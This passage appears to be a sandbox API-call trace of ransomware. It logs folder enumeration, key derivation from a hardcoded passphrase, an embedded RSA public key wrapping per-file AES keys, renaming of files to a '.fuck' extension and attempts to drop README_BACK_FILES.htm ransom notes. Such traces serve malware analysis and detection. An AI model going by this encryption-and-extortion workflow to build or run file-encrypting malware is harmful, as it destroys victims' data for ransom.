[0240.159] CloseHandle (hObject=0xffffffff) returned 1 [0240.160] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.160] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.160] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg")) returned 0 [0240.161] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.fuck")) returned 0 [0240.161] CryptDestroyHash (hHash=0x28e8478) returned 1 [0240.161] CryptDestroyKey (hKey=0x28e84f8) returned 1 [0240.161] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.161] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.161] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8538 [0240.161] FindNextFileA (in: hFindFile=0x28e8538, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.161] FindNextFileA (in: hFindFile=0x28e8538, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.161] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8578 [0240.161] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.162] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.162] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.162] GetLastError () returned 0x5 [0240.162] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.162] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.162] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.162] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.163] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.163] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d4b40) returned 1 [0240.165] CryptCreateHash (in: hProv=0x28d4b40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.165] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.165] CryptHashData (hHash=0x28e8478, pbData=0x27e2678, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.165] CryptDeriveKey (in: hProv=0x28d4b40, Algid=0x6610, hBaseData=0x28e8478, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e84b8) returned 1 [0240.165] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.165] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.165] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d4788) returned 1 [0240.166] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4788, dwCertEncodingType=0x1, pInfo=0x28c8628*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8658*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8660*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e87f8) returned 1 [0240.166] CryptEncrypt (in: hKey=0x28e87f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.166] CryptEncrypt (in: hKey=0x28e87f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d40a0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d40a0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.166] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d40a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.166] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.166] CryptEncrypt (in: hKey=0x28e84b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.166] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.166] CloseHandle (hObject=0xffffffff) returned 1 [0240.166] CloseHandle (hObject=0xffffffff) returned 1 [0240.166] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.167] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.167] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.167] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.168] CryptDestroyHash (hHash=0x28e8478) returned 1 [0240.168] CryptDestroyKey (hKey=0x28e84b8) returned 1 [0240.168] CryptReleaseContext (hProv=0x28d4b40, dwFlags=0x0) returned 1 [0240.168] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.168] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.168] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.168] AreFileApisANSI () returned 1 [0240.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.169] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.169] GetLastError () returned 0x5 [0240.169] GetLastError () returned 0x5 [0240.169] FindNextFileA (in: hFindFile=0x28e8538, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.169] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.169] GetLastError () returned 0x5 [0240.169] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml")) returned 0x20 [0240.169] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.170] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.170] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.170] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.171] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0240.173] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.173] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.173] CryptHashData (hHash=0x28e8978, pbData=0x27e21f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.173] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8978, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e89b8) returned 1 [0240.173] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.173] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.173] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d4128) returned 1 [0240.173] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4128, dwCertEncodingType=0x1, pInfo=0x28c7448*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7478*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7480*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e8338) returned 1 [0240.173] CryptEncrypt (in: hKey=0x28e8338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.173] CryptEncrypt (in: hKey=0x28e8338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4238*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d4238*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.174] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4238, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.174] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.174] CryptEncrypt (in: hKey=0x28e89b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.174] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.174] CloseHandle (hObject=0xffffffff) returned 1 [0240.174] CloseHandle (hObject=0xffffffff) returned 1 [0240.174] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.174] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.175] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg")) returned 0 [0240.175] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.fuck")) returned 0 [0240.176] CryptDestroyHash (hHash=0x28e8978) returned 1 [0240.176] CryptDestroyKey (hKey=0x28e89b8) returned 1 [0240.176] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.176] FindNextFileA (in: hFindFile=0x28e8538, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.176] FindClose (in: hFindFile=0x28e8538 | out: hFindFile=0x28e8538) returned 1 [0240.176] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.176] AreFileApisANSI () returned 1 [0240.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.176] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.177] GetLastError () returned 0x5 [0240.177] GetLastError () returned 0x5 [0240.177] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.177] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.177] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\readme_back_files.htm")) returned 0xffffffff [0240.177] AreFileApisANSI () returned 1 [0240.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.178] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.178] GetLastError () returned 0x5 [0240.178] GetLastError () returned 0x5 [0240.178] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.178] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84b8 [0240.178] FindNextFileA (in: hFindFile=0x28e84b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.178] FindNextFileA (in: hFindFile=0x28e84b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.179] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.179] GetLastError () returned 0x5 [0240.179] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml")) returned 0x20 [0240.179] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.179] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.180] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.180] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.180] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.183] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.183] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.183] CryptHashData (hHash=0x28e8a78, pbData=0x27e2420, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.183] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8a78, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8478) returned 1 [0240.183] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.183] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.183] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d4920) returned 1 [0240.183] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4920, 